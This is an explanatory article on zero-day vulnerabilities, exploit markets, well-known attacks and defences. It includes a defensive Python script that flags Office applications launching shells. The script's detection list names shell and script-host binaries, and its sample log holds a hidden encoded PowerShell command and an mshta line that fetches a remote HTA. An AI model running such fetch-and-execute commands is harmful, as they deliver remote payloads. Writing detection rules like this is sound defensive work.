What is zero day?
Most software has had a bug at some point. But what if that bug has the potential to open backdoors for hackers to exploit? Worse still, what if the developers of the software have no idea it exists? Criminals can abuse these so-called zero day vulnerabilities for months or even years before anyone patches them. So what are these vulnerabilities? And how much damage can they cause?
What is zero day?
The phrase “zero day” can refer to two different concepts — zero day vulnerabilities and zero day exploits. So, let’s start with the first one.
A zero day vulnerability is a flaw in software or hardware that its vendor does not yet know about. Because nobody has had a chance to fix it, there is no patch to apply and no way to close the hole. It can be any kind of flaw: a memory-safety bug, a missing authorization check, an unencrypted channel, to name a few examples.
The term zero day refers to how long the vendor has known about the problem: zero days. The name goes back to the bulletin-board warez scene, where a "0-day" release was a pirated copy of a program circulating on the same day the software was officially published, i.e. available zero days after release.
In the best case, whoever discovers a zero day vulnerability reports it privately to the software developers (coordinated disclosure) so they can patch it before it is exploited. Public databases such as the CVE list exist so the cybersecurity community can pool its knowledge about flaws once they are disclosed. Unfortunately, sometimes the attackers get there first.
Zero day exploits and attacks
This brings us to the zero day exploit. A zero day exploit is the code or technique an attacker uses to take advantage of a zero day vulnerability for their own ends. Using it against a target is a zero day attack: installing backdoors, dropping malware, or stealing sensitive information.
Because a zero day attack has a good chance of going undetected (there is no signature and no patch for a bug nobody knows exists), these vulnerabilities are extremely valuable. The buyers are not only criminals looking to profit from the weak security of a large organization; intelligence agencies around the world also acquire and use zero day exploits.
The global exploit market
Discovering, buying, and selling zero day vulnerabilities has become an industry of its own.
- Black markets: criminals buy and sell zero day vulnerabilities and working exploits for use in attacks, trading information on how a given software bug can be abused.
- Grey markets: brokers and researchers sell vulnerabilities and exploits to militaries, intelligence agencies, and other government buyers, usually under contract and without the affected vendor being told.
- White markets: bug bounty programs and coordinated disclosure, where researchers report the flaw to the vendor of the affected software, which fixes it and usually publishes a CVE entry for it.
So, what happens when hackers find the vulnerabilities before the vendors do?
Famous zero day attacks
There are many infamous zero day attack examples throughout modern history. Let’s take a look at some of the most notorious incidents.
Stuxnet was a computer worm, discovered in 2010, that used several Windows zero day vulnerabilities to spread and then targeted the supervisory control and data acquisition (SCADA) systems that control industrial equipment.
The worm caused enormous damage to Iran's nuclear program. It is reported to have destroyed nearly a fifth of Iran's uranium-enrichment centrifuges and infected a staggering 200,000 computers along the way. It is often described as one of the first cyber weapons because it was built to cause physical damage rather than to steal data; the United States and Israel are widely believed to be behind it.
The 2014 Sony Pictures hack is another frequently cited zero day incident. The attackers reportedly used a zero day vulnerability to break into the company's network and steal data, then wiped systems and leaked what they had taken.
The leaked material included copies of unreleased films, the company's plans for the future, business deals, employee personal data, and the emails of Sony's top management. Which exploit the attackers used was never publicly confirmed.
In 2017, attackers exploited a then-unpatched flaw in how Microsoft Word handled embedded objects to deliver the Dridex banking Trojan. A booby-trapped document attached to an email ran the exploit as soon as it was opened, which then downloaded and installed Dridex without the victim having to enable macros. Dridex itself was not new (it had been stealing online-banking credentials since 2014), but the zero day gave an existing piece of malware a delivery method that reached millions of users worldwide.
Browsers are vulnerable too
It's not just the apps you install that get targeted. The browser you're reading this blog post in can be exploited too, and because it processes untrusted content from every site you visit, it is one of the most attractive targets there is.
Firefox zero day
In 2020 Firefox had memory-safety vulnerabilities that let an attacker run code of their choosing inside the browser process, so that visiting a malicious page was enough to compromise the victim's device. Mozilla released emergency patches, but not before the flaws had been exploited in targeted attacks in the wild.
Google Chrome zero day
2021 hasn't been a good year for Chrome. By the time of writing, Google had already issued three emergency patches for zero day vulnerabilities that were being exploited in the wild. Bugs of this kind typically let an attacker who can lure you onto a malicious page run code on the affected system, or at minimum crash the browser (a denial of service).
Zero days and the workplace environment
Since any software you use can be hit by a zero day, what does that mean for businesses? A single flawed line of code in a product you rely on can hand an attacker a way into your organization's systems, so the first step is to change how you think about cybersecurity.
Most organizations' responses to security incidents are reactive: they respond to threats that are already known, using signatures and patches that already exist. A zero day has neither. By the time you know what happened, the attacker is already inside.
The key to zero day protection is therefore a proactive approach that does not depend on knowing the specific bug: monitor what processes, accounts and hosts actually do, keep logs you can investigate, and detect the behaviour an exploit produces (a document viewer spawning a shell, a workstation suddenly talking to an unknown server) rather than the exploit itself.
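Here is what "detect the behaviour, not the bug" looks like in practice. The script below is an added example and not part of the original post: it runs a single behavioural rule over process-creation logs and flags any Office application that launches a shell or scripting host. That parent/child pairing is what the Word-based Dridex delivery described above would have produced, and it fires regardless of which Word vulnerability was used, known or not. The log format (timestamp, host, parent image, image, command line, separated by pipes) is a constructed simplification of Windows process-creation events such as Sysmon Event ID 1, and the sample lines are invented for this example.

```python
"""Behavioural detection of document-based zero day exploitation.

Added example (not from the original post). Rule: an Office process
spawning a shell, script host or living-off-the-land binary is almost
never legitimate, so alert on the parent/child pair rather than on any
specific exploit. The log format below is a constructed simplification
of Windows process-creation events (Sysmon Event ID 1 / Event 4688).
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Iterable, List, Optional

# Office applications whose documents are the usual carrier for exploit files.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Interpreters and LOLBins an exploit payload typically launches to get from
# "code execution inside Word" to "malware running on the machine".
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe",
}


@dataclass(frozen=True)
class ProcessEvent:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> Optional[ProcessEvent]:
    """Parse one 'ts | host | parent | image | cmdline' record (constructed
    format). Returns None for malformed lines so one bad record cannot
    abort the whole scan."""
    fields = [f.strip() for f in line.split("|", 4)]
    if len(fields) != 5 or not fields[0]:
        return None
    return ProcessEvent(*fields)


def image_name(path: str) -> str:
    """'C:\\...\\WINWORD.EXE' -> 'winword.exe'. Compare on the basename only:
    install paths vary between machines, and the attacker does not control
    which process Word's exploit runs inside of."""
    return PureWindowsPath(path).name.lower()


def is_office_spawning_shell(event: ProcessEvent) -> bool:
    """The rule itself: Office parent + shell/script-host child."""
    return (image_name(event.parent_image) in OFFICE_PARENTS
            and image_name(event.image) in SUSPICIOUS_CHILDREN)


def detect(lines: Iterable[str]) -> List[ProcessEvent]:
    """Run the rule over raw log lines and return the events that fire."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event is not None and is_office_spawning_shell(event):
            alerts.append(event)
    return alerts


# Constructed sample log. Expected: line 3 (Word -> cmd.exe) and the last
# line (Excel -> mshta.exe) alert; Word printing via splwow64.exe and a user
# opening cmd.exe from Explorer do not; the malformed line is skipped.
SAMPLE_LOG = r"""
2021-03-12T09:14:02Z | ws-017 | C:\Windows\explorer.exe | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | "WINWORD.EXE" /n "C:\Users\j.doe\Downloads\invoice.docx"
2021-03-12T09:14:05Z | ws-017 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe | C:\Windows\splwow64.exe 12288
2021-03-12T09:14:09Z | ws-017 | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Windows\System32\cmd.exe | cmd.exe /c powershell -w hidden -enc SQBFAFgA...
2021-03-12T09:14:10Z | ws-017 | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -w hidden -enc SQBFAFgA...
2021-03-12T09:20:44Z | ws-022 | C:\Windows\explorer.exe | C:\Windows\System32\cmd.exe | cmd.exe
garbage line without separators
2021-03-12T09:31:17Z | ws-022 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe | mshta http://203.0.113.5/x.hta
"""


if __name__ == "__main__":
    for e in detect(SAMPLE_LOG.splitlines()):
        print(f"ALERT {e.timestamp} {e.host}: {image_name(e.parent_image)} "
              f"spawned {image_name(e.image)}: {e.command_line}")
```

The rule is deliberately narrow so that it produces few false positives; the splwow64.exe line shows a legitimate Word child that must not alert. In a real deployment the same idea is expressed as a Sysmon or EDR rule on ParentImage/Image, and extended with the grandchild relationship (here cmd.exe launching PowerShell) so the chain is visible even when the first hop is missed.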
Zero day protection
So, how do you protect yourself from a threat you don't know about? Remember that a zero day is rarely used on its own: it usually arrives through a phishing email, a malicious web page or a compromised site, and the attacker still has to do something noticeable once inside. Here's how to lower your risk of falling victim to an attack:
- Update your software as soon as patches are available. Once a zero day is found and fixed it is no longer a zero day, but attackers keep using it for as long as unpatched systems remain, so every day between patch release and installation is a day you are exposed.
- Stay informed. Follow vendor advisories and vulnerability databases for the software you run, and if you develop software, consider a bug bounty program so researchers have a reason to tell you about flaws rather than sell them to someone else.
- Be wary of phishing scams. Many zero day attacks only work if the victim opens a document or follows a link, so don't open unexpected attachments or click unknown links; you may end up handing an attacker both your data and your machine.
- Use security tools, and know what each one does. Antivirus and endpoint detection can catch the behaviour that follows exploitation (dropped files, suspicious child processes) even when the exploit itself is unknown. A VPN encrypts your traffic on untrusted networks and hides your IP address, but it does not stop a malicious document or web page from exploiting your browser or office suite, so treat it as one layer alongside patching, least privilege and monitoring rather than a substitute for them.